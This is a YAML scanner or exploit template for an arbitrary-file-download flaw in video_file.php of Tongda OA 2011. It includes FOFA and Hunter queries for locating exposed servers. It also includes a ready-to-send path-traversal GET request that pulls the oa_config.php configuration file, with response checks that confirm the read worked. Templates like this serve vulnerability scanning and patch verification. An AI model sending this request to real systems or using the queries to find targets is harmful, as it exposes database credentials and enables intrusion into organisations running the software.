product: 通达OA
vName: 通达OA video_file.php 任意文件下载
type: 文件读取
vID: [ ]
level: 3
vDesc: 通达OA video_file.php文件存在任意文件下载漏洞，攻击者通过漏洞可以读取服务器敏感文件。
version: 通达OA2011
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: https://blog.csdn.net/qq_33331244/article/details/136154185
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 用户未登录
              - MYSQL
            logic: and